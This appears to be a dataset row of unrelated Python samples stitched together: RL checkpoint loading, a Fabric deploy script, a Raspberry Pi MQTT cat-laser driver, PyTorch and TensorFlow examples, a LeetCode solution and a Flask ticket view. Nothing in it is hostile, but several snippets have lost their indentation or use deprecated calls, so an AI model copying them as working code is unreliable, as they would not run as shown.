print("load critic weight: {:.3f} !!!!".format(module_max_param(self.critic)))
hard_update(self.critic_target, self.critic, self.tau)
if hasattr(self, 'traj_feature_extractor') and os.path.exists(traj_feat_path):
net_dict = torch.load(traj_feat_path)
self.traj_feature_extractor.load_state_dict(net_dict["net"], strict=False)
print('load traj feature weight: {:.3f} from {} !!!!'.format(module_max_param(self.traj_feature_extractor), traj_feat_path))
try:
self.traj_feature_extractor_opt.load_state_dict(net_dict["opt"])
self.traj_feature_extractor_sch.load_state_dict(net_dict["sch"])
            except Exception:
                pass
if hasattr(self, 'train_traj_sampler') and os.path.exists(traj_sampler_path):
net_dict = torch.load(traj_sampler_path)
self.traj_feature_sampler.load_state_dict(net_dict["net"], strict=False)
print('load traj sampler weight: {:.3f} from {} !!!!'.format(module_max_param(self.traj_feature_sampler), traj_sampler_path))
try:
self.traj_feature_sampler_opt.load_state_dict(net_dict["opt"])
self.traj_feature_sampler_sch.load_state_dict(net_dict["sch"])
            except Exception:
                pass
if os.path.exists(state_feat_path):
net_dict = torch.load(state_feat_path)
if has_check(self, 'reinit_feat_opt'):
self.state_feature_extractor.load_state_dict(dict([(n, p) for n, p in net_dict["net"].items() if 'value' not in n ]),strict=False)
else:
self.state_feature_extractor.load_state_dict(net_dict["net"] )
self.state_feature_extractor_optim.load_state_dict(net_dict["opt"])
self.state_feature_extractor_scheduler.load_state_dict( net_dict["sch"] )
self.state_feat_encoder_optim.load_state_dict( net_dict["encoder_opt"] )
self.state_feat_encoder_scheduler.load_state_dict( net_dict["encoder_sch"] )
if not has_check(self, 'reinit_feat_opt'):
self.state_feat_val_encoder_optim.load_state_dict(
net_dict["val_encoder_opt"] )
self.state_feat_val_encoder_scheduler.load_state_dict(
net_dict["val_encoder_sch"] )
print(
"load feature weight: {} !!!! from: {} step :{}".format(
module_max_param(self.state_feature_extractor), state_feat_path, net_dict["step"]))
self.update_step = net_dict["step"]
self.init_step = self.update_step
return self.update_step
return 0
| StarcoderdataPython |
84243 | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 12 13:16:08 2018
@author: <NAME>
"""
"""colRecoder2(dataFrame, colName, oldVal, newVal):
requires: pandas dataFrame; colName must be the column itself (e.g. df.colName), not a string name
effects: returns a copy of the column. Does NOT mutate data.
Thus must be assigned to change data.
"""
def colRecoder2(dataFrame, colName, oldVal, newVal):
    columnCopy = colName.copy()
    columnCopy[columnCopy == oldVal] = newVal
return columnCopy | StarcoderdataPython |
3232545 | # -*- coding: utf-8 -*-
from datetime import datetime
from fabric.api import *
# Login user and host names:
env.user = 'root'
env.hosts = ['192.168.127.12']  # with multiple hosts, fabric deploys to each in turn
def pack():
    'Define the pack task.'
    # Build a tar archive:
tar_files = ['*.py', 'static/*', 'templates/*']
#local('rm -f example.tar.gz')
local('tar -czvf example.tar.gz --exclude=\'*.tar.gz\' --exclude=\'fabfile.py\' %s' % ' '.join(tar_files))
def deploy():
    'Define the deploy task.'
    # Temporary file on the remote server:
    remote_tmp_tar = '/tmp/example.tar.gz'
    tag = datetime.now().strftime('%Y-%m-%d_%H.%M.%S')
run('rm -f %s' % remote_tmp_tar)
    # Upload the tar file to the remote server:
put('example.tar.gz', remote_tmp_tar)
    # Unpack it:
remote_dist_dir = '/srv/www.example.com-%s' % tag
remote_dist_link = '/srv/www.example.com'
run('mkdir %s' % remote_dist_dir)
with cd(remote_dist_dir):
run('tar -xzvf %s' % remote_tmp_tar)
    # Set www-data ownership on the new directory:
# run('chown -R www-data:www-data %s' % remote_dist_dir)
    # Remove the old symlink:
run('rm -f %s' % remote_dist_link)
    # Create a new symlink pointing to the newly deployed directory:
run('ln -s %s %s' % (remote_dist_dir, remote_dist_link))
# run('chown -R www-data:www-data %s' % remote_dist_link)
    # Restart fastcgi:
# fcgi = '/etc/init.d/py-fastcgi'
# with settings(warn_only=True):
# run('%s stop' % fcgi)
# run('%s start' % fcgi)
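# Typical invocation (illustrative): run both tasks in order from the project root:
#   fab pack deploy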
| StarcoderdataPython |
3356987 | <gh_stars>0
import pygame
from os import path
import spawns
import constants as con
class Overheat:
def __init__(self):
self.__overheat = 0
self.__hot = False
def get_Overheat(self):
return self.__overheat
def reset_Overheat(self):
self.__overheat = 0
def cool(self):
self.__hot = False
def update_Overheat(self, dO):
self.__overheat += dO
if self.__overheat < 0:
self.__overheat = 0
if self.__overheat > 100:
self.__overheat = 100
def update_Hot(self, update):
self.__hot = update
def get_Hot(self):
return self.__hot
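if __name__ == "__main__":
    # Minimal illustrative usage of the Overheat helper above.
    heat = Overheat()
    heat.update_Overheat(40)
    heat.update_Overheat(75)       # total is clamped at 100
    print(heat.get_Overheat())     # -> 100
    heat.update_Hot(True)
    heat.cool()
    print(heat.get_Hot())          # -> False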
| StarcoderdataPython |
1701689 | def squaresum(n):
    total = 0
    for i in range(1, n + 1):
        total += i * i
    return total
n=int(input("enter the number : "))
print(squaresum(n))
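# The loop agrees with the closed-form identity 1^2 + 2^2 + ... + n^2 = n*(n+1)*(2*n+1)/6,
# e.g. squaresum(10) == 10*11*21 // 6 == 385.
assert squaresum(10) == 10 * 11 * 21 // 6 == 385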
| StarcoderdataPython |
1704512 | <filename>data-models/python-datawrangling/src/gda/datawrangling/test_parse_xml.py
# -*- coding: utf-8 -*-
"""
Parse an XML file.
"""
import unittest
from xml.etree import ElementTree as ET
import pprint
class TestParseXML(unittest.TestCase):
def test_read(self):
tree = ET.parse("../../../data/data-text.xml")
root = tree.getroot()
all_data = []
data = root.find("Data") # 查找子节点
for observation in data:
record = {}
for item in observation:
                lookup_key = list(item.attrib.keys())[0]  # get the node's first attribute name
if lookup_key == "Numeric":
rec_key = "NUMERIC"
rec_value = item.attrib['Numeric']
else:
rec_key = item.attrib[lookup_key]
rec_value = item.attrib['Code']
record[rec_key] = rec_value
all_data.append(record)
pprint.pprint(all_data)
if __name__ == '__main__':
unittest.main()
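# For reference, the parsing loop above assumes data-text.xml is shaped roughly
# like the WHO-style structure below (illustrative, not the actual file):
#   <Root>
#     <Data>
#       <Observation>
#         <Dim Category="COUNTRY" Code="CAN"/>
#         <Dim Category="YEAR" Code="1990"/>
#         <Value Numeric="98.5"/>
#       </Observation>
#       ...
#     </Data>
#   </Root>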
| StarcoderdataPython |
3241564 | from __future__ import absolute_import, division, print_function, unicode_literals
from baseline import Baseline
multiple = Baseline("""
WHITESPACE
""")
| StarcoderdataPython |
3297567 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 11:08:12 2020
@author: nmei
This is a template script for training a convolutional neural network to perform
a categorical task, discriminating living vs nonliving images in an fMRI experiment.
The convolutional layers are from pre-trained networks that were trained on
the ImageNet dataset.
The goal of the script is to emulate the behavioral performance of human subjects
in discriminating the image without any noise or color.
The network we will use is:
1. Convolutional layers -- pretrained
2. Adaptive pooling -- pooling, making the convolutional outputs a 1-D vector
3. hidden layer - K-units fully-connected layer
4. hidden activation - varies
5. output layer - 1 or 2 units full-connected layer
6. output activation - varies
Experiment parameters:
1. pretrain model
2. hidden layer units
3. hidden activation
4. output layer units
5. output activation
Particularly:
This is a Pytorch implementation, which is slightly different from a
Tensorflow implementation. During training, the corresponding output activation
functions (softmax/sigmoid) are log-scaled (log-softmax/log-sigmoid) because
that is what the PyTorch loss functions expect. But at the end, when predicting
the probability of each class (living vs. nonliving), plain softmax/sigmoid is used.
"""
import os
from glob import glob
from collections import OrderedDict
import numpy as np
import torch
from torchvision import transforms
from sklearn import metrics
from utils_deep import (data_loader,
createLossAndOptimizer,
train_loop,
validation_loop,
hidden_activation_functions,
behavioral_evaluate,
build_model
)
# experiment control
model_dir = '../models'
train_folder = 'greyscaled'
valid_folder = 'experiment_images_greyscaled'
train_root = f'../data/{train_folder}/'
valid_root = f'../data/{valid_folder}'
print_train = True #
image_resize = 128
batch_size = 8
lr = 1e-4
n_epochs = int(1e3)
device = 'cpu'
pretrain_model_name = 'vgg19_bn'
hidden_units = 20
hidden_func_name = 'relu'
hidden_activation = hidden_activation_functions(hidden_func_name)
hidden_dropout = 0.
patience = 5
output_activation = 'softmax'
model_saving_name = f'{pretrain_model_name}_{hidden_units}_{hidden_func_name}_{hidden_dropout}_{output_activation}'
testing = True #
n_experiment_runs = 20
if output_activation == 'softmax':
output_units = 2
categorical = True
elif output_activation == 'sigmoid':
output_units = 1
categorical = False
if not os.path.exists(os.path.join(model_dir,model_saving_name)):
os.mkdir(os.path.join(model_dir,model_saving_name))
augmentations = {
'train':transforms.Compose([
transforms.Resize((image_resize,image_resize)),
transforms.RandomHorizontalFlip(p = 0.5),
transforms.RandomRotation(45,),
transforms.RandomVerticalFlip(p = 0.5,),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'valid':transforms.Compose([
transforms.Resize((image_resize,image_resize)),
transforms.RandomHorizontalFlip(p = 0.5),
transforms.RandomRotation(25,),
transforms.RandomVerticalFlip(p = 0.5,),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
}
train_loader = data_loader(
train_root,
augmentations = augmentations['train'],
batch_size = batch_size,
)
valid_loader = data_loader(
valid_root,
augmentations = augmentations['valid'],
batch_size = batch_size,
)
print('set up random seeds')
torch.manual_seed(12345)
if torch.cuda.is_available():torch.cuda.empty_cache();torch.cuda.manual_seed(12345);
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'device:{device}')
model_to_train = build_model(
pretrain_model_name,
hidden_units,
hidden_activation,
hidden_dropout,
output_units,
)
model_to_train.to(device)
model_parameters = filter(lambda p: p.requires_grad, model_to_train.parameters())
params = sum([np.prod(p.size()) for p in model_parameters])
print(pretrain_model_name,
# model_to_train(next(iter(train_loader))[0]),
f'total params = {params}')
f_name = os.path.join(model_dir,model_saving_name,model_saving_name+'.pth')
loss_func,optimizer = createLossAndOptimizer(model_to_train,learning_rate = lr)
if (not os.path.exists(f_name)) or (testing):
best_valid_loss = torch.from_numpy(np.array(np.inf))
losses = []
for idx_epoch in range(n_epochs):
# train
print('training ...')
train_loss = train_loop(
net = model_to_train,
loss_func = loss_func,
optimizer = optimizer,
dataloader = train_loader,
device = device,
categorical = categorical,
idx_epoch = idx_epoch,
print_train = print_train,
output_activation = output_activation,
)
print('validating ...')
valid_loss,y_pred,y_true,features,labels= validation_loop(
net = model_to_train,
loss_func = loss_func,
dataloader = valid_loader,
device = device,
categorical = categorical,
output_activation = output_activation,
)
y_pred = torch.cat(y_pred)
y_true = torch.cat(y_true)
score = metrics.roc_auc_score(y_true.detach().cpu(),y_pred.detach().cpu())
print(f'\nepoch {idx_epoch + 1}, loss = {valid_loss:6f},score = {score:.4f}')
if valid_loss.cpu().clone().detach().type(torch.float64) < best_valid_loss:
best_valid_loss = valid_loss.cpu().clone().detach().type(torch.float64)
torch.save(model_to_train,f_name)
else:
model_to_train = torch.load(f_name)
losses.append(best_valid_loss)
if (len(losses) > patience) and (len(set(losses[-patience:])) == 1):
break
#model_to_train = torch.load(f_name)
#
#y_trues,y_preds,scores,features,labels = behavioral_evaluate(model_to_train,
# n_experiment_runs,
# loss_func,
# valid_loader,
# device,
# categorical = categorical,
# output_activation = output_activation,
# )
| StarcoderdataPython |
1755054 | # Time: O(n * k)
# Space: O(k)
# Given two integers n and k, find how many different arrays consist of numbers
# from 1 to n such that there are exactly k inverse pairs.
#
# We define an inverse pair as following: For ith and jth element in the array,
# if i < j and a[i] > a[j] then it's an inverse pair; Otherwise, it's not.
#
# Since the answer may be very large, return it modulo 10^9 + 7.
#
# Example 1:
# Input: n = 3, k = 0
# Output: 1
# Explanation:
# Only the array [1,2,3] which consists of numbers from 1 to 3 has exactly 0 inverse pair.
# Example 2:
# Input: n = 3, k = 1
# Output: 2
# Explanation:
# The array [1,3,2] and [2,1,3] have exactly 1 inverse pair.
# Note:
# The integer n is in the range [1, 1000] and k is in the range [0, 1000].
class Solution(object):
def kInversePairs(self, n, k):
"""
:type n: int
:type k: int
:rtype: int
"""
M = 1000000007
dp = [[0]*(k+1) for _ in xrange(2)]
dp[0][0] = 1
for i in xrange(1, n+1):
dp[i%2] = [0]*(k+1)
dp[i%2][0] = 1
for j in xrange(1, k+1):
dp[i%2][j] = (dp[i%2][j-1] + dp[(i-1)%2][j]) % M
if j-i >= 0:
dp[i%2][j] = (dp[i%2][j] - dp[(i-1)%2][j-i]) % M
return dp[n%2][k]
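# Reference checks from the examples above:
#   Solution().kInversePairs(3, 0) -> 1
#   Solution().kInversePairs(3, 1) -> 2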
| StarcoderdataPython |
44418 | <reponame>boonepeter/cat-laser<gh_stars>0
# Raspberry Pi Cat Laser Driver
# This code controls the laser pointer servos to target the laser at different
# locations. Make sure to modify the MQTT_SERVER variable below so that it points
# to the name or IP address of the host computer for the cloud server VM (i.e. the
# machine running the Vagrant virtual machine that has the MQTT broker).
# Author: <NAME>
import sys
import model
import servos
import paho.mqtt.client as mqtt
import parse
import RPi.GPIO as GPIO
from evdev import InputDevice, categorize, ecodes
# Configuration:
SERVO_I2C_ADDRESS = 0x40 # I2C address of the PCA9685-based servo controller
SERVO_XAXIS_CHANNEL = 1 # Channel for the x axis rotation which controls laser up/down
SERVO_YAXIS_CHANNEL = 0 # Channel for the y axis rotation which controls laser left/right
LASER_CHANNEL = 5
SERVO_PWM_FREQ = 50 # PWM frequency for the servos in HZ (should be 50)
SERVO_MIN = 150 # Minimum rotation value for the servo, should be -90 degrees of rotation.
SERVO_MAX = 600 # Maximum rotation value for the servo, should be 90 degrees of rotation.
SERVO_CENTER = 400 # Center value for the servo, should be 0 degrees of rotation.
MQTT_SERVER = 'localhost' # MQTT server to connect to for receiving commands.
MQTT_PORT = 1883 # Port for the MQTT server.
LASER_GPIO = 23 # GPIO pin connected to a transistor that controls the laser on/off.
# MQTT topics used for controlling the laser.
TOPIC_TARGET = 'catlaser/target'
TOPIC_RELATIVE = 'catlaser/relative'
TOPIC_PATH = 'catlaser/path'
TOPIC_LASER = 'catlaser/laser'
CONTROLLER_LOCATION = "/dev/input/event0"
# Create servo and laser movement model.
servos = servos.Servos(SERVO_I2C_ADDRESS, SERVO_XAXIS_CHANNEL, SERVO_YAXIS_CHANNEL, LASER_CHANNEL, SERVO_PWM_FREQ)
model = model.LaserModel(servos, SERVO_MIN, SERVO_MAX, SERVO_CENTER, LASER_GPIO)
gamepad = InputDevice(CONTROLLER_LOCATION)
# MQTT callbacks:
def on_connect(client, userdata, flags, rc):
# Called when connected to the MQTT server.
print('Connected to MQTT server!')
# Subscribe to the laser targeting topic.
client.subscribe(TOPIC_TARGET)
client.subscribe(TOPIC_PATH)
client.subscribe(TOPIC_RELATIVE)
client.subscribe(TOPIC_LASER)
def on_message(client, userdata, msg):
# Called when a MQTT message is received.
print('{0}: {1}'.format(msg.topic, str(msg.payload)))
# Handle a target request.
if msg.topic == TOPIC_TARGET:
# Try to parse out two numbers from the payload. These are the
# screen x and screen y coordinates for the target command.
result = parse.parse('{:d},{:d}', msg.payload.decode('ascii'))
if result is not None:
# Got a valid pair of numbers, use the laser model to target that
# position.
model.target(result[0], result[1])
elif msg.topic == TOPIC_RELATIVE:
# Try to parse out two numbers from the payload. These are the
# relative coordinates for the relative target command.
result = parse.parse('{:d},{:d}', msg.payload.decode('ascii'))
if result is not None:
# Got a valid pair of numbers, use the laser model to target that
# position.
model.target_relative(result[0], result[1])
elif msg.topic == TOPIC_PATH:
lines = msg.payload.decode("ascii")
lines = lines.split(";")
path_list = []
for line in lines:
            result = parse.parse("{:d},{:d}", line)
if result is not None:
path_list.append((result[0], result[1]))
model.target_path(path_list)
elif msg.topic == TOPIC_LASER:
mess = msg.payload.decode('ascii')
if mess == "ON":
model.Laser_On()
elif mess == "OFF":
model.Laser_Off()
else:
model.Toggle_Laser()
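# For reference (illustrative), target and laser commands can be published from
# any MQTT client on the broker's network, e.g. with mosquitto_pub:
#   mosquitto_pub -h <MQTT_SERVER> -t catlaser/target -m "150,200"
#   mosquitto_pub -h <MQTT_SERVER> -t catlaser/laser -m "ON"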
def on_disconnect(client, userdata, rc):
# Called when disconnected by the MQTT server. For now just prints out the
# result code/reason for disconnecting and quits.
print('Disconnected with rc: {0}'.format(rc))
sys.exit(1)
# Turn the laser on by setting its control GPIO high.
GPIO.setmode(GPIO.BCM)
GPIO.setup(LASER_GPIO, GPIO.OUT)
GPIO.output(LASER_GPIO, GPIO.HIGH)
# Setup MQTT client and connect to server.
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_disconnect = on_disconnect
client.connect(MQTT_SERVER, MQTT_PORT, 60)
# Run a loop in the foreground that waits for MQTT events/messages and processes
# them appropriately with the callbacks above. The loop_forever call will never
# return!
print('Press Ctrl-C to quit...')
client.loop_forever()
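# NOTE: loop_forever() blocks indefinitely, so the gamepad control loop below
# only runs if the call above is removed or replaced with loop_start().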
print("Welcome to the cat laser toy!")
print("- D-pad: Move")
print("- B: Laser on/off")
print("- L/R bumper: fast mode")
print("- Start: sleep")
print("- A: keep track of movement")
print("- X: play back movement")
model.target(305, 305)
move_list = []
is_laser_on = True
up = False
down = False
left = False
right = False
to_break = False
l_trig = False
r_trig = False
change_laser_on = False
keep_track = False
play_moves = False
while True:
if to_break:
while to_break:
time.sleep(0.5)
try:
events = gamepad.read()
for event in events:
if event.type == ecodes.EV_KEY:
if event.code == 297: #START
if event.value == 1:
to_break = False
except BlockingIOError:
#do nothing
pass
x = 0
y = 0
if up:
y = 10
elif down:
y = -10
if left:
x = -10
elif right:
x = 10
if (x != 0) or (y != 0):
if l_trig or r_trig:
x *= 2
y *= 2
model.target_relative(x, y)
if keep_track and (x != 0 or y != 0):
move_list.append((x, y, True))
if play_moves:
for ex, why, on in move_list:
if on:
model.Laser_On()
else:
model.Laser_Off()
model.target_relative(ex, why)
play_moves = False
if change_laser_on:
if is_laser_on:
model.Laser_On()
else:
model.Laser_Off()
change_laser_on = False
try:
events = gamepad.read()
for event in events:
if event.type == ecodes.EV_KEY:
if event.code == 296: # SELECT
#print("Select")
pass
elif event.code == 297: #START
if event.value == 1:
to_break = True
elif event.code == 291: # Y button
#print("Y")
pass
elif event.code == 288: # X button
if event.value == 1:
play_moves = True
elif event.code == 290: # B button
if event.value == 1:
if is_laser_on:
is_laser_on = False
change_laser_on = True
else:
is_laser_on = True
change_laser_on = True
elif event.code == 289: # A button
if event.value == 1:
keep_track = True
elif event.value == 0:
keep_track = False
elif event.code == 293: # Right Trigger
if event.value == 1:
r_trig = True
elif event.value == 0:
r_trig = False
elif event.code == 292: # Left trigger
if event.value == 1:
l_trig = True
elif event.value == 0:
l_trig = False
elif event.type == ecodes.EV_ABS:
if event.code == 0: # X direction
if event.value == 0: #Left down
left = True
right = False
if event.value == 127:
left = False
right = False
elif event.value == 255: #Right down
right = True
left = False
elif event.code == 1: #Y direction
if event.value == 0: #up direction
down = True
up = False
elif event.value == 127:
up = False
down = False
elif event.value == 255: #down direction
down = False
up = True
except BlockingIOError:
#do nothing
pass
| StarcoderdataPython |
1630512 | import tensorflow as tf
'''
Tensor Operations: initializations, constants, variables, shapes, reshaping
'''
######## Tensors: Varying shapes ###################
a = tf.constant(1.2, dtype=tf.float32, name='a')
b = tf.constant(3.4, dtype=tf.float32, name='b')
c = tf.constant([1.5, 44.3, 55.4], dtype=tf.float32, name='c')
d = tf.constant([[1.5, 44.3, 55.4]], dtype=tf.float32, name='d')
e = tf.constant([[1.5], [44.3], [55.4]], dtype=tf.float32, name='e')
f = tf.constant(4.44, dtype=tf.float32, shape=[4,2], name='f')
g = tf.constant([0.3, 6.7], name='g')
h = tf.constant([4.2, 2.1], name='h')
i = tf.constant([[[1, 11, 111], [2, 22, 222]],
[[3, 33, 333], [4, 44, 444]],
[[5, 55, 555], [6, 66, 666]]],
dtype=tf.int32, name='i')
############ Logical Operations ##########
onesTensor = tf.ones_like(g)
negOnesTensor = (-1)*tf.ones_like(g)
# Compare two tensors... note that these tensors have multiple values
# select() compares items-by-items
sel1 = tf.select(tf.greater_equal(g, h), onesTensor, negOnesTensor, name='sel1')
sel2 = tf.select(tf.less_equal(g, 4.), onesTensor, negOnesTensor, name='sel2')
init = tf.global_variables_initializer()
############ Slicing and Dicing ############
slice_op = tf.slice(i, begin=[1,1,0], size=[2, 1, 2])
# Reverse slicing requires negative stride
strided_slice_op = tf.strided_slice(i, begin=[-1,0,0], end=[-3, 2, 3], strides=[-1, 1, 2])
with tf.Session() as sess:
init.run()
print('----------- Shape and Values --------------')
print('a: {0}\n shape{1}\n\n'.format(a.eval(), a.get_shape().as_list()))
print('c: {0}\n shape{1}\n\n'.format(c.eval(), c.get_shape().as_list()))
print('d: {0}\n shape{1}\n\n'.format(d.eval(), d.get_shape().as_list()))
print('e: {0}\n shape{1}\n\n'.format(e.eval(), e.get_shape().as_list()))
print('f: {0}\n shape{1}\n\n'.format(f.eval(), f.get_shape().as_list()))
print('i: {0}\n shape{1}\n\n'.format(i.eval(), i.get_shape().as_list()))
print('---------- Selection --------------')
print('g: {0}\n'.format(g.eval()))
print('h: {0}\n'.format(h.eval()))
print('sel1: {0}\n'.format(sel1.eval()))
print('sel2: {0}\n'.format(sel2.eval()))
print('---------- Slicing ----------------')
slice_val = slice_op.eval()
strided_slice_val = strided_slice_op.eval()
print('Slice_op:\n{0}\n-------\nshape{1}\n\n'.format(slice_val, slice_val.shape))
print('Strided Slice_op:\n{0}\n-------\nshape{1}\n\n'.format(strided_slice_val, strided_slice_val.shape))
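# Expected results (assuming standard TF slicing semantics): slice_op picks
# rows 1-2 of dim 0, row 1 of dim 1 and the first two entries of dim 2, giving
# [[[4, 44]], [[6, 66]]] with shape (2, 1, 2); strided_slice_op walks dim 0 in
# reverse and every other entry of dim 2, giving
# [[[5, 555], [6, 666]], [[3, 333], [4, 444]]] with shape (2, 2, 2).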
| StarcoderdataPython |
1645729 | <reponame>maxpowel/flask_bundle<gh_stars>0
from .bundle import FlaskBundle, ApiBlueprints
| StarcoderdataPython |
3299840 | <gh_stars>1-10
from collections import defaultdict as dd
G = dd(lambda :dd(lambda :0))
vis = dd(lambda :False)
def load_data():
N,M,C1,C2 = [int(x) for x in input().split()]
weight = [int(x) for x in input().split()]
for i in range(M):
c1, c2, L = [int(x) for x in input().split()]
G[c1][c2] = G[c2][c1] = L
return C1, C2, weight
def dijkstra(s, weight):
d = dd(lambda :10**9)
d[s] = 0
nums = dd(lambda :0)
nums[s] = 1
w = dd(lambda :0)
w[s] = weight[s]
for i in range(len(G)):
u = min([v for v in G if not vis[v]], key=lambda v: d[v])
vis[u] = True
for v in G[u]:
if not vis[v]:
if d[u] + G[u][v] < d[v]:
d[v] = d[u] + G[u][v]
w[v] = w[u] + weight[v]
nums[v] = nums[u]
elif d[u] + G[u][v] == d[v]:
nums[v] += nums[u]
if w[u] + weight[v]>w[v]:
w[v] = w[u] + weight[v]
return nums, w
C1, C2, weight = load_data()
nums, w = dijkstra(C1, weight)
print(nums[C2], w[C2])
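# Worked example (illustrative input): with the lines below on stdin there are
# two shortest 0->2 paths of length 2 (0-2 and 0-1-2), and the larger total
# weight along them is 1+2+1 = 4, so the program prints "2 4".
#   5 6 0 2
#   1 2 1 5 3
#   0 1 1
#   0 2 2
#   0 3 1
#   1 2 1
#   2 4 1
#   3 4 1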
| StarcoderdataPython |
3339509 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-08 09:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('subjects', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('schools', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Teachers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fstname', models.CharField(max_length=45)),
('lstname', models.CharField(max_length=45)),
('phone_no', models.CharField(max_length=20)),
('teacher_type', models.CharField(choices=[(b'TSC', b'TSC'), (b'BRD', b'BOARD')], default=b'TSC', max_length=3)),
('birthday', models.DateField(blank=True, null=True)),
('gender', models.CharField(choices=[(b'M', b'MALE'), (b'F', b'FEMALE')], default=b'ML', max_length=2)),
('tsc_no', models.CharField(blank=True, max_length=200, null=True)),
('bom_no', models.CharField(blank=True, max_length=200, null=True)),
('qualifications', models.CharField(blank=True, choices=[(b'UNI', b'UNIVERSITY'), (b'COL', b'COLLEGE')], default=b'COL', max_length=3, null=True)),
('date_started_teaching', models.DateField(blank=True, null=True)),
('joined_current_school', models.DateField(blank=True, null=True)),
('headteacher', models.BooleanField(default=False)),
('active', models.BooleanField(default=True)),
('school', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schools.Schools')),
('subjects', models.ManyToManyField(blank=True, null=True, to='subjects.Subjects')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| StarcoderdataPython |
120442 | """
0011. Container With Most Water
Medium
Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0). Find two lines, which, together with the x-axis forms a container, such that the container contains the most water.
Notice that you may not slant the container.
Example 1:
Input: height = [1,8,6,2,5,4,8,3,7]
Output: 49
Explanation: The above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. In this case, the max area of water (blue section) the container can contain is 49.
Example 2:
Input: height = [1,1]
Output: 1
Example 3:
Input: height = [4,3,2,1,4]
Output: 16
Example 4:
Input: height = [1,2,1]
Output: 2
Constraints:
2 <= height.length <= 3 * 10^4
0 <= height[i] <= 3 * 10^4
"""
from typing import List
class Solution:
def maxArea(self, height: List[int]) -> int:
i, j, res = 0, len(height) - 1, 0
while i < j:
if height[i] < height[j]:
res = max(res, height[i] * (j - i))
i += 1
else:
res = max(res, height[j] * (j - i))
j -= 1
return res
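# A quick self-check against the examples in the docstring above (an added
# sketch, not part of the original LeetCode submission):
if __name__ == '__main__':
    solver = Solution()
    assert solver.maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49
    assert solver.maxArea([1, 1]) == 1
    assert solver.maxArea([4, 3, 2, 1, 4]) == 16
    assert solver.maxArea([1, 2, 1]) == 2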
| StarcoderdataPython |
1782300 | <reponame>GHDDI-AILab/Targeting2019-nCoV<filename>util/test1.py
import numpy as np
import pandas as pd
print(np.sum([1,2,3,4,5])) | StarcoderdataPython |
67449 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright <NAME>: <EMAIL>
from datetime import datetime
from flask import redirect
from flask import request
from flask import make_response
from flask import render_template
from flask import Response
from flask import url_for
from flask_babel import gettext
from flask_login import login_required
from application import app
from application.flicket.forms.search import SearchTicketForm
from application.flicket.models.flicket_models import FlicketTicket
from . import flicket_bp
def clean_csv_data(input_text):
output_text = input_text.replace('"', "'")
return output_text
def tickets_view(page, is_my_view=False):
"""
Function common to 'tickets' and 'my_tickets' expect where query is filtered for users own tickets.
"""
form = SearchTicketForm()
# get request arguments from the url
status = request.args.get("status")
institute = request.args.get("institute")
domain = request.args.get("domain")
content = request.args.get("content")
requester = request.args.get("requester")
referee = request.args.get("referee")
user_id = request.args.get("user_id")
requester_role = request.args.get("requester_role")
request_stage = request.args.get("request_stage")
procedure_stage = request.args.get("procedure_stage")
if form.validate_on_submit():
redirect_url = FlicketTicket.form_redirect(form, url="flicket_bp.tickets")
return redirect(redirect_url)
arg_sort = request.args.get("sort")
if arg_sort:
print(arg_sort)
args = request.args.copy()
del args["sort"]
response = make_response(redirect(url_for("flicket_bp.tickets", **args)))
response.set_cookie(
"tickets_sort",
arg_sort,
max_age=2419200,
path=url_for("flicket_bp.tickets", **args),
)
return response
sort = request.cookies.get("tickets_sort")
if sort:
set_cookie = True
else:
sort = "date_desc"
set_cookie = False
ticket_query, form = FlicketTicket.query_tickets(
form,
institute=institute,
domain=domain,
status=status,
user_id=user_id,
content=content,
requester=requester,
referee=referee,
requester_role=requester_role,
request_stage=request_stage,
procedure_stage=procedure_stage,
)
if is_my_view:
ticket_query = FlicketTicket.my_tickets(ticket_query)
ticket_query = FlicketTicket.sorted_tickets(ticket_query, sort)
number_results = ticket_query.count()
ticket_query = ticket_query.paginate(page, app.config["posts_per_page"])
title = gettext("Tickets")
if is_my_view:
title = gettext("My Tickets")
if content:
form.content.data = content
if requester:
form.requester.data = requester
if referee:
form.referee.data = referee
response = make_response(
render_template(
"flicket_tickets.html",
title=title,
form=form,
tickets=ticket_query,
page=page,
number_results=number_results,
status=status,
institute=institute,
domain=domain,
requester_role=requester_role,
request_stage=request_stage,
procedure_stage=procedure_stage,
user_id=user_id,
sort=sort,
base_url="flicket_bp.tickets",
)
)
if set_cookie:
response.set_cookie(
"tickets_sort", sort, max_age=2419200, path=url_for("flicket_bp.tickets")
)
return response
# tickets main
@flicket_bp.route(app.config["FLICKET"] + "tickets/", methods=["GET", "POST"])
@flicket_bp.route(
app.config["FLICKET"] + "tickets/<int:page>/", methods=["GET", "POST"]
)
@login_required
def tickets(page=1):
response = tickets_view(page)
return response
@flicket_bp.route(app.config["FLICKET"] + "tickets_csv/", methods=["GET", "POST"])
@login_required
def tickets_csv():
# get request arguments from the url
status = request.args.get("status")
institute = request.args.get("institute")
domain = request.args.get("domain")
content = request.args.get("content")
requester = request.args.get("requester")
referee = request.args.get("referee")
user_id = request.args.get("user_id")
ticket_query, form = FlicketTicket.query_tickets(
institute=institute,
domain=domain,
status=status,
user_id=user_id,
content=content,
requester=requester,
referee=referee,
)
ticket_query = ticket_query.limit(app.config["csv_dump_limit"])
date_stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
file_name = date_stamp + "ticketdump.csv"
